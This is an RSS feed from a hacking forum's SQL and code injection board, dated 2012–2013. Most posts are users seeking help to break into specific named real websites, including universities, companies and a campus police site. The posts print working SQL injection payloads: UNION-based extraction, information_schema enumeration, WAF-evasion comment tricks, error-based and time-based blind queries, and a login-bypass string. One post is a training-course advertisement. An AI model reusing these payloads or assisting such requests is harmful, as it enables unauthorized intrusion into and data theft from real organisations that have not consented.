<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>Web Application Security Forum - SQL and Code Injection</title>
        <description>How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack.</description>
        <link>http://sla.ckers.org/forum/list.php?16</link>
        <lastBuildDate>Mon, 20 May 2013 02:55:35 -0500</lastBuildDate>
        <generator>Phorum 5.2.15a</generator>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51757,51757#msg-51757</guid>
            <title>how to bypass this WAF? (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51757,51757#msg-51757</link>
            <description><![CDATA[http://redc.lums.edu.pk/enrollment.php?section_id=10&amp;pcid=53.0'  UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12--+<br />
<br />
5.5.17<br />
but cann't get database() and version(),and cann't get column_name or table_name<br />
I have tried many methords to bypass ,but it doesn't work! <br />
<br />
Thanks for your kindness replay!]]></description>
            <dc:creator>annen</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Mon, 20 May 2013 01:44:37 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51747,51747#msg-51747</guid>
            <title>Bypass ASP null byte (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51747,51747#msg-51747</link>
            <description><![CDATA[ANyone has idea to bypass asp with null byte on this link: http://bit.ly/17lNtvV<br />
<br />
Thanks.]]></description>
            <dc:creator>m1cr0n</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Mon, 13 May 2013 11:37:02 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51737,51737#msg-51737</guid>
            <title>i can get data, plz help with this waf !!!!! (7 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51737,51737#msg-51737</link>
            <description><![CDATA[hi after many test and check im blocked here :<br />
<br />
www.site.com/?id=info_details&amp;ida=-2 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,unhex(hex(table_name)),4,5,6,7,8,9+from /*!information_schema*/.tables limit 10,1--<br />
<br />
i can get &quot;user&quot; , all okayyy :<br />
<br />
now with this :<br />
<br />
www.site.com/?id=info_details&amp;ida=-2 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,unhex(hex(column_name)),4,5,6,7,8,9+from /*!information_schema*/.columns where table_name='users'--<br />
<br />
<br />
<br />
<br />
im also do this  :<br />
<br />
.......table_name=CHAR(117, 115, 101, 114, 115)--<br />
<br />
but i get nothing i can't extract data , what's my mistak, <br />
<br />
no error and no data  :( <br />
<br />
 tell me what's wrong plz, thnk's ,and  for all your replay for my previos topic  (thanggiangho, hack2012 ,ajkaro... )  it's help than ky u very much  :)]]></description>
            <dc:creator>versus</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Mon, 06 May 2013 20:02:12 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51731,51731#msg-51731</guid>
            <title>a wierd Sql Injection (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51731,51731#msg-51731</link>
            <description><![CDATA[Injection:http://store.yam.com/store/index.php?action=store_product_sort&amp;prod_sort_uid=400')%20and%201=2<br />
<br />
<br />
This Injection can't be connected in sqlmap y others inject tools, these tools show me Host No Found. i've used the normal method like order by xx, it doesn't work here,and the this injection don't expose the mysql_error. <br />
<br />
<br />
<br />
I think the sql is select * from xx where id in('xx'), any Helps??]]></description>
            <dc:creator>Desperado</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Fri, 26 Apr 2013 04:02:55 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51729,51729#msg-51729</guid>
            <title>waf or somthing wrong !!!! (2 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51729,51729#msg-51729</link>
            <description><![CDATA[hi, and thnk's for this great forum :<br />
<br />
i have probleme like that  :<br />
<br />
www.vuln.org?id=1'<br />
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource <br />
<br />
ok <br />
<br />
www.vuln.org?id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,3,4,5,6,7,8,9--<br />
<br />
3 and 4<br />
<br />
id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,version(),4,5,6,7,8,9--<br />
<br />
5.5.23-55<br />
<br />
<br />
ok<br />
<br />
this is problem WAF block me here !!!!!!!<br />
<br />
id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,/*!group_concat*/(table_name),4,5,6,7,8,9 from /*!information_schema*/.tables where table_schema=database()--<br />
<br />
<br />
i have this :<br />
<br />
Forbidden<br />
<br />
You don't have permission to access / on this server.<br />
<br />
<br />
<br />
so with this <br />
<br />
www.vuln.org?id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,/*!table_name*/,4,5,5,6,7,8,9 /*!from*/ /*!InfoRmation_SCHEMa*/.`tables`--<br />
<br />
i have :<br />
<br />
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource <br />
<br />
<br />
<br />
<br />
plz tell me other option to bypass this waf, thnk's.]]></description>
            <dc:creator>versus</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Tue, 30 Apr 2013 07:22:59 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51723,51723#msg-51723</guid>
            <title>how to bypass this WAF  can u help plz (4 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51723,51723#msg-51723</link>
            <description><![CDATA[this vuln url :<br />
http://www.cobra.com.dz/produits_cat_detail.php?id=325'<br />
<br />
Une erreur est survenue 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'325 AND actif=1' at line 1 Veuillez contacter votre administrateur<br />
<br />
with sqlamp commnade check-waf : it's protected, no way to get databases how to bypass it ? plz]]></description>
            <dc:creator>versus</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Thu, 18 Apr 2013 12:01:08 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51720,51720#msg-51720</guid>
            <title>The Art of Exploiting Injection Flaws (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51720,51720#msg-51720</link>
            <description><![CDATA[The popular course on Injection Flaws will return to Las Vegas at Black hat 2013.<br />
<br />
More details can be found here:<br />
<br />
https://www.blackhat.com/us-13/training/the-art-of-exploiting-injection-flaws.html<br />
<br />
Some of the new additions to the course are:<br />
<br />
Oracle SQLI- how to execute OS code, how to do priv esc from web app, OOB<br />
extraction. Examples of burp pro missing SQLI. Injection in order by/group by, 2nd order injection etc.<br />
<br />
<br />
XPath: We will show a new attack with which you can not just read any arbitrary XML file on system but any file with any extension.<br />
LDAP- some really good example of auth bypass and blind ldap tool.<br />
XXE- not too new stuff but good pointer on where to look for these.<br />
Direct code injection- examples of recent ruby on rail and other framework issues such as expression query language injection etc.<br />
<br />
<br />
Cheers<br />
Sid]]></description>
            <dc:creator>notsosecure</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Mon, 15 Apr 2013 07:58:06 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51709,51709#msg-51709</guid>
            <title>[SqlMap] How to Exploit Sqlia AND/OR time-based blind? (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51709,51709#msg-51709</link>
            <description><![CDATA[Hello everybody,<br />
<br />
I found 2 different SQLIA in a website.<br />
The Sqlia is POST method type and affected the login form.<br />
The first one is:<br />
<br />
    Type:boolean-based blind<br />
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)<br />
    Payload: account=-4241' OR (1251=1251)#&amp;password=test<br />
<br />
This one is pretty simple query, but return something strange, cause if i try for example to login with a specific accont and bypass the login looks like impossibile for me, cause with this query i grant the access of the last user register on the DB. I need some help for structure the query much better and bypass the login with all the user that i want. <br />
<br />
The second one is: <br />
<br />
Type: AND/OR time-based blind<br />
Title: MySQL &lt; 5.0.12 AND time-based blind (heavy query)<br />
Payload: account=test' AND 1939=BENCHMARK(5000000,MD5(0x7463556e)) AND 'kpiJ'='kpiJ&amp;password=test<br />
<br />
This one works good, but not good enough, cause is pretty slow and sometimes sqlmap lost somechar.<br />
With this one i was able to get some good information from the DB like (DBS, TABLES) but right now i need to get the COLUMNS, and after that the DATA, and i need something faster and clear.<br />
<br />
Someone can help me to structure the best command line for setting up in the best way sqlmap for my needs?<br />
<br />
Thx in advance.<br />
<br />
<br />
(Dont ask me for the Link cause i cant share or provide in pvt as well)]]></description>
            <dc:creator>Nerder</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Mon, 25 Mar 2013 09:04:43 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51687,51687#msg-51687</guid>
            <title>[Perl] WebApp, How can i exploit? (3 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51687,51687#msg-51687</link>
            <description><![CDATA[Hello everyone,<br />
Is couple of days that i try to exploit this webapplication, coded in perl.<br />
<br />
Someone already try to do something similar?<br />
I hope in a fast help.<br />
Thx in advance.<br />
<br />
This one is a simple dork, many website use this application and everyone have the same vulnz:<br />
<br />
http://goo.gl/cgnXG<br />
<br />
this is the error that i found:<br />
<br />
http://imgur.com/19kk2Q5<br />
<br />
*Edit: correct some error.]]></description>
            <dc:creator>Nerder</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Sun, 10 Feb 2013 08:24:43 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51679,51679#msg-51679</guid>
            <title>SQLi problems. (4 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51679,51679#msg-51679</link>
            <description><![CDATA[Hi everybody, I'm having seriusly problems so as to make an SQLi.<br />
I'm versus MYSQL 4.0.2 so it's a blind SQLi... and I'm trying to know table names..<br />
<br />
 1 and (/*!50000 Select*/ 1) = 1-- <br />
<br />
seems to be functional but i have tried<br />
<br />
 1 and (/*!50000 Select count(*) from*/ COLLATION) = 1 -- <br />
<br />
and I can't see the webpage... and It's strange because COLLATION is a table that ever exists... so I don't know where the problem is. <br />
<br />
Gr33tings!<br />
<br />
PD. I'm new in SQLi any guide is accepted.]]></description>
            <dc:creator>Sr.Gr33n</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Mon, 11 Mar 2013 11:29:04 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51672,51672#msg-51672</guid>
            <title>[MsSQl Injection] Only select works and how to create an error. (2 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51672,51672#msg-51672</link>
            <description><![CDATA[Hi.<br />
<br />
I found this vuln and i m trying to exploit it two days now. It a little curious how it seems that it works.  <br />
<br />
with a single quote :<br />
<br />
.asp?id=8'<br />
<br />
RETURNED :<br />
<br />
Microsoft OLE DB Provider for SQL Server error '80040e14'<br />
Unclosed quotation mark after the character string ''.<br />
<br />
But if you try to use group by or something like or 1=1 / and 1=1 <br />
<br />
.asp?id=8 having 1=1--<br />
.asp?id=8 or 1=1--<br />
<br />
RETURNED:<br />
<br />
Microsoft OLE DB Provider for SQL Server error '80040e14'<br />
Incorrect syntax near the keyword 'having'.<br />
<br />
Microsoft OLE DB Provider for SQL Server error '80040e14'<br />
Incorrect syntax near the keyword 'or'.<br />
<br />
After that i tried to see which sql command will not return error.<br />
I ve just put select *<br />
<br />
.asp?id=8 select *--<br />
<br />
and RETURNED:<br />
<br />
Microsoft OLE DB Provider for SQL Server error '80040e14'<br />
Must specify table to select from.<br />
<br />
Hmm a different error from the others. So i said to try retrieve some table names from information_schema and i execute<br />
<br />
.asp?id=8 select table_name from information_schema.tables--<br />
<br />
but RETURNED no ERROR and page laded correctly.<br />
<br />
I thought that my query was executed without an error and that's why it happened.<br />
Let's create an error<br />
<br />
.asp?id=8+convert(int,(select table_name from information_schema.tables))--<br />
<br />
RETURNED:<br />
<br />
Microsoft OLE DB Provider for SQL Server error '80040e14'<br />
Incorrect syntax near the keyword 'convert'.<br />
<br />
So this is my story. <br />
Does anyone have an idea on how to make it print out the error ?<br />
Any hint is welcomed!]]></description>
            <dc:creator>netpumber</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Thu, 07 Mar 2013 15:21:56 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51668,51668#msg-51668</guid>
            <title>Only blind methord? (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51668,51668#msg-51668</link>
            <description><![CDATA[http://www.urbannovember.org/conference/rst.php?op=about_rst&amp;cf=2&amp;id=31' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30​,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53--+-<br />
cann't have a valiable column.I know it can use blind ,but I want to know if UNION methord or error base methord can use or not .]]></description>
            <dc:creator>annen</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Mon, 31 Dec 2012 23:42:11 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51667,51667#msg-51667</guid>
            <title>help a 500 server error SQLi (1 reply)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51667,51667#msg-51667</link>
            <description><![CDATA[http://www.scnutrition.org/index.php?ax=view&amp;id=119  union select1,2,3<br />
500 server error ,when I use overflow methord it doesn't work!<br />
can you help me to bypass this?<br />
Thanks a lot!]]></description>
            <dc:creator>annen</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Fri, 12 Apr 2013 02:18:22 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51658,51658#msg-51658</guid>
            <title>Help me using a Padding Oracle Attack (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51658,51658#msg-51658</link>
            <description><![CDATA[I have got an url :<br />
&lt;script src=&quot;/WebResource.axd?d=kUZpzrS7T4Aq19EFDnm37jwncsRBLhzwWbOBQT5YtQQq0A1-N1xjYjrhCxrpxaU-oQ78BubcRGaU-8Rq0Lkqg56SbZ81&amp;amp;t=634245226248165742<br />
<br />
How to hack it by using Padding Oracel attack? <br />
<br />
I have tried Padbuster tools but it come some error,can someone help me ?]]></description>
            <dc:creator>sukh0i</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Sat, 22 Dec 2012 01:08:46 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51657,51657#msg-51657</guid>
            <title>Admin login forbidden (1 reply)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51657,51657#msg-51657</link>
            <description><![CDATA[Hi all,<br />
<br />
 me new to SQLi, have got the username and password for a website which has WAF. and the website has the admin login page as follows,<br />
example.com///access/sf2.mdb. WAF deny me to open this page. I had used the following trick to bypassing waf while extracting the data.<br />
<br />
exaple.com/newsID=-1 union (select 1,2,table_name,4,5 from /*!information_schema*/.tables) -- <br />
<br />
can somebody help me to get this admin page?<br />
<br />
thanks in advance champs.]]></description>
            <dc:creator>secdude</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Sat, 29 Dec 2012 04:43:52 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51653,51653#msg-51653</guid>
            <title>Aspx login bypass (1 reply)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51653,51653#msg-51653</link>
            <description><![CDATA[Closed!]]></description>
            <dc:creator>Hanna313</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Sun, 16 Dec 2012 00:54:21 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51647,51647#msg-51647</guid>
            <title>A hard WAF! (1 reply)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51647,51647#msg-51647</link>
            <description><![CDATA[http://www.nbcffc.com/zt_news/index.php?id=24<br />
<br />
column number 3]]></description>
            <dc:creator>annen</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Thu, 13 Dec 2012 22:54:35 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51646,51646#msg-51646</guid>
            <title>wAF nee help! (2 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51646,51646#msg-51646</link>
            <description><![CDATA[http://www.zug4you.ch/cms/file.php<br />
?PHPSESSID=4afbd15e53033b39eb6fbeb04234dcb8<br />
&amp;id=24 unIoN SEleCT 1,2,3,4,5,6,7,8--+-<br />
<br />
I tried /*!*/、 /*!12345*/、URLencode、double URLencode、*、()<br />
<br />
but it didn't work! Please help me!]]></description>
            <dc:creator>annen</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Tue, 18 Dec 2012 09:08:40 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51642,51642#msg-51642</guid>
            <title>this SQLi how to injection? (2 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51642,51642#msg-51642</link>
            <description><![CDATA[http://www.aeaweb.org/articles.php?doi=10.1257/jel.50.1.51]]></description>
            <dc:creator>annen</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Fri, 14 Dec 2012 08:37:34 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51641,51641#msg-51641</guid>
            <title>pass general protection-asp+access (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51641,51641#msg-51641</link>
            <description><![CDATA[http://www.hcis.com.cn/xx.asp?id=1047<br />
get post cookie can't inject <br />
it's general protection but maybe encode can inject,can you?]]></description>
            <dc:creator>kn1ghtc</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Mon, 10 Dec 2012 02:41:23 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51634,51634#msg-51634</guid>
            <title>WAF i cann't bypass it! (2 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51634,51634#msg-51634</link>
            <description><![CDATA[http://www.cbds.org.br/noticias.php?id=132<br />
You have an error in your SQL syntax;<br />
http://www.cbds.org.br/noticias.php?id=132 or 1 GroUp by concat_ws(0x00,vesion(),floor(rand(0)*2)) having min(0) or 1--+- cann't work!]]></description>
            <dc:creator>annen</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Fri, 14 Dec 2012 08:39:59 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51628,51628#msg-51628</guid>
            <title>need a software to scan SQL Injection Vulnerability,anyone knows? (2 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51628,51628#msg-51628</link>
            <description><![CDATA[I need a SQL Injection Vulnerability scanner tools,because chineae SQL Injection Vulnerability scanner tools cann't scan string type,and my system is WIN7,so can you kindly recommend some free SQL Injection Vulnerability scanner tools or cracked SQL Injection Vulnerability scanner tools?<br />
thanks all of you!]]></description>
            <dc:creator>annen</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Tue, 11 Dec 2012 07:29:27 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51627,51627#msg-51627</guid>
            <title>An attack was detected,Blocked because of IPS attack (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51627,51627#msg-51627</link>
            <description><![CDATA[Blocked because of IPS attack<br />
<br />
<br />
An attack was detected, originating from your system. Please contact the system administrator.<br />
<br />
http://www.carpatiagroup.com/subsubcat.php?tip=id_subsubcat&amp;id=61' aNd 12=12--+-true<br />
<br />
http://www.carpatiagroup.com/subsubcat.php?tip=id_subsubcat&amp;id=61' aNd 12=122--+-error]]></description>
            <dc:creator>annen</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Thu, 06 Dec 2012 08:18:20 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51626,51626#msg-51626</guid>
            <title>A WAF  please help me! (4 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51626,51626#msg-51626</link>
            <description><![CDATA[http://regphos.mbc.nctu.edu.tw/browse_kinase_detail.php?kinase=null' UNION SELECT 1,2,3,4,5,6,7,8,9,/*!12345VerSioN()*/,11,12--+-]]></description>
            <dc:creator>annen</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Fri, 07 Dec 2012 19:29:30 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51619,51619#msg-51619</guid>
            <title>is this a vulnerabilities? (1 reply)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51619,51619#msg-51619</link>
            <description><![CDATA[http://www.iveh.org/?id=25<br />
http://www.iveh.org/?id=-25 SQL error]]></description>
            <dc:creator>annen</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Wed, 05 Dec 2012 09:55:46 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51618,51618#msg-51618</guid>
            <title>bypass this WAF! (3 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51618,51618#msg-51618</link>
            <description><![CDATA[http://epaper.ntu.edu.tw/view.php?id=2452<br />
<br />
http://continue.austincc.edu/index/view.php?id=62211<br />
<br />
<br />
Thanks a lot!]]></description>
            <dc:creator>annen</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Wed, 05 Dec 2012 20:04:26 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51614,51614#msg-51614</guid>
            <title>error base methord. can you bypass this WAF? (5 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51614,51614#msg-51614</link>
            <description><![CDATA[https://www.southernct.edu/search/directories/profile/?id=48952+or+1+group+by+concat_ws(0x00,version(),floor(rand(0)*2))+having+min(0)+or+1--+-<br />
<br />
version 5.0.5<br />
cannt get database()]]></description>
            <dc:creator>annen</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Mon, 10 Dec 2012 02:05:02 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51604,51604#msg-51604</guid>
            <title>404 error how to bypass? (4 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51604,51604#msg-51604</link>
            <description><![CDATA[http://202.195.136.6/sjk/redirect_bz2.php?id=21 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--  ok<br />
<br />
http://202.195.136.6/sjk/redirect_bz2.php?id=-21 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- 404 error<br />
<br />
thanks for your help!]]></description>
            <dc:creator>annen</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Tue, 04 Dec 2012 23:43:11 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51602,51602#msg-51602</guid>
            <title>strange SQLi (4 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51602,51602#msg-51602</link>
            <description><![CDATA[http://police.ucsf.edu/index.php?/ID-Cards/' xor 'a'='as true<br />
http://police.ucsf.edu/index.php?/ID-Cards/' xor 'as'='as false<br />
<br />
http://police.ucsf.edu/index.php?/ID-Cards/' xor '12'='1 true<br />
http://police.ucsf.edu/index.php?/ID-Cards/' xor '12'='12 false<br />
<br />
Is this a SQli?]]></description>
            <dc:creator>annen</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Tue, 04 Dec 2012 22:18:30 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51601,51601#msg-51601</guid>
            <title>SQL cheat (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51601,51601#msg-51601</link>
            <description><![CDATA[complete cheat sheet]]></description>
            <dc:creator>gtone</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Wed, 28 Nov 2012 13:57:19 -0600</pubDate>
        </item>
    </channel>
</rss>
